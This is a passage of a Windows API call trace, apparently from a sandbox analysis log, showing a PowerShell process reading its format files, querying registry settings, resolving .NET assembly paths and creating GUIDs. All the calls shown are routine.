	[0784.517] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.518] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.518] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.518] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0784.518] ReadFile (in: hFile=0x328, lpBuffer=0x2c30ffa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c30ffa*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0784.518] ReadFile (in: hFile=0x328, lpBuffer=0x2c318e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c318e0*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0784.518] CloseHandle (hObject=0x328) returned 1
	[0784.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0784.519] SetErrorMode (uMode=0x1) returned 0x1
	[0784.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d380 | out: lpFileInformation=0x16d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0784.519] SetErrorMode (uMode=0x1) returned 0x1
	[0784.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0784.519] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0784.519] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0784.519] CoTaskMemAlloc (cb=0x5a) returned 0x1b737300
	[0784.520] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737300, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0784.520] CoTaskMemFree (pv=0x1b737300) 
	[0784.520] RegCloseKey (hKey=0x328) returned 0x0
	[0784.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0784.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0784.521] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xb7b6c4e2, Data2=0xdd00, Data3=0x484e, Data4=([0]=0x84, [1]=0x89, [2]=0x87, [3]=0x81, [4]=0x8a, [5]=0xad, [6]=0xd1, [7]=0xcf))) returned 0x0
	[0784.522] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x45d626b7, Data2=0x85a7, Data3=0x493d, Data4=([0]=0xa1, [1]=0x96, [2]=0xaa, [3]=0xd2, [4]=0x8e, [5]=0xec, [6]=0x3f, [7]=0x61))) returned 0x0
	[0784.522] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xff2df3ea, Data2=0x5c2, Data3=0x44da, Data4=([0]=0x90, [1]=0xf0, [2]=0x47, [3]=0xe0, [4]=0x9, [5]=0x28, [6]=0x98, [7]=0x27))) returned 0x0
	[0784.522] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xda4bab68, Data2=0x1146, Data3=0x4339, Data4=([0]=0xb5, [1]=0x52, [2]=0xc5, [3]=0xb, [4]=0x15, [5]=0xb, [6]=0xad, [7]=0x96))) returned 0x0
	[0784.522] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xb249be60, Data2=0xab9c, Data3=0x4301, Data4=([0]=0xae, [1]=0xd0, [2]=0x2, [3]=0x5a, [4]=0x85, [5]=0x6f, [6]=0xab, [7]=0xe6))) returned 0x0
	[0784.523] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xabe71a98, Data2=0xc37f, Data3=0x466d, Data4=([0]=0x8f, [1]=0x11, [2]=0xb5, [3]=0x4e, [4]=0x7e, [5]=0x17, [6]=0x9c, [7]=0xae))) returned 0x0
	[0784.523] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0784.523] GetFileType (hFile=0x328) returned 0x1
	[0784.523] SetErrorMode (uMode=0x1) returned 0x1
	[0784.523] GetFileType (hFile=0x328) returned 0x1
	[0784.523] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.524] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.524] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.524] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.525] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.525] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0784.525] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0xaca, lpOverlapped=0x0) returned 1
	[0784.525] ReadFile (in: hFile=0x328, lpBuffer=0x2c7cc72, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7cc72*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0784.525] ReadFile (in: hFile=0x328, lpBuffer=0x2c7d640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2c7d640*, lpNumberOfBytesRead=0x16d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0784.525] CloseHandle (hObject=0x328) returned 1
	[0784.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0784.526] SetErrorMode (uMode=0x1) returned 0x1
	[0784.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d380 | out: lpFileInformation=0x16d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0784.526] SetErrorMode (uMode=0x1) returned 0x1
	[0784.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0784.526] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d468 | out: phkResult=0x16d468*=0x328) returned 0x0
	[0784.526] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3ec, lpData=0x0, lpcbData=0x16d3e8*=0x0 | out: lpType=0x16d3ec*=0x1, lpData=0x0, lpcbData=0x16d3e8*=0x56) returned 0x0
	[0784.527] CoTaskMemAlloc (cb=0x5a) returned 0x1b737300
	[0784.527] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3bc, lpData=0x1b737300, lpcbData=0x16d3b8*=0x56 | out: lpType=0x16d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3b8*=0x56) returned 0x0
	[0784.527] CoTaskMemFree (pv=0x1b737300) 
	[0784.527] RegCloseKey (hKey=0x328) returned 0x0
	[0784.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0784.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0784.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0784.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0784.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0785.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0785.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0785.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0785.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0785.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0785.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0785.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0785.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0785.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0785.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0785.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0785.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0785.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0785.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0785.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.446] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x4569b1d9, Data2=0x768e, Data3=0x40fe, Data4=([0]=0x9b, [1]=0xc3, [2]=0x1f, [3]=0xc7, [4]=0xfa, [5]=0x24, [6]=0xd3, [7]=0x7f))) returned 0x0
	[0785.446] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x7aba266a, Data2=0xa78b, Data3=0x4fd1, Data4=([0]=0x91, [1]=0x8e, [2]=0xa8, [3]=0xf9, [4]=0x21, [5]=0x44, [6]=0x83, [7]=0xcb))) returned 0x0
	[0785.446] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x13f3703b, Data2=0x94ff, Data3=0x4f7e, Data4=([0]=0x9c, [1]=0x85, [2]=0x56, [3]=0x55, [4]=0xf5, [5]=0x1a, [6]=0xfe, [7]=0x62))) returned 0x0
	[0785.447] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0xa9849e97, Data2=0x8b02, Data3=0x4f2a, Data4=([0]=0xb9, [1]=0x28, [2]=0x36, [3]=0x2c, [4]=0x3, [5]=0x19, [6]=0x29, [7]=0x2d))) returned 0x0
	[0785.447] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x32e6eb69, Data2=0xa049, Data3=0x454c, Data4=([0]=0x9a, [1]=0x75, [2]=0x39, [3]=0xe0, [4]=0xd6, [5]=0x6, [6]=0xe2, [7]=0xca))) returned 0x0
	[0785.448] VirtualQuery (in: lpAddress=0x16b970, lpBuffer=0x16c830, dwLength=0x30 | out: lpBuffer=0x16c830*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0785.448] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x80b51ebc, Data2=0x67e, Data3=0x4146, Data4=([0]=0xba, [1]=0xa9, [2]=0xed, [3]=0xd0, [4]=0xe5, [5]=0x5d, [6]=0xf7, [7]=0xc4))) returned 0x0
	[0785.448] CoCreateGuid (in: pguid=0x16d690 | out: pguid=0x16d690*(Data1=0x570e38fb, Data2=0xa253, Data3=0x4539, Data4=([0]=0x9b, [1]=0xf0, [2]=0xf0, [3]=0xd3, [4]=0x74, [5]=0xe8, [6]=0xc4, [7]=0x2b))) returned 0x0
	[0785.448] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0785.448] GetFileType (hFile=0x328) returned 0x1
	[0785.449] SetErrorMode (uMode=0x1) returned 0x1
	[0785.449] GetFileType (hFile=0x328) returned 0x1
	[0785.449] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.450] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.450] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.450] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.450] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.450] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.451] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.451] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.452] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.452] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.452] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.452] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.453] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0785.453] ReadFile (in: hFile=0x328, lpBuffer=0x2d2fc38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2d2fc38*, lpNumberOfBytesRead=0x16d3d8*=0x1000, lpOverlapped=0x0) returned 1
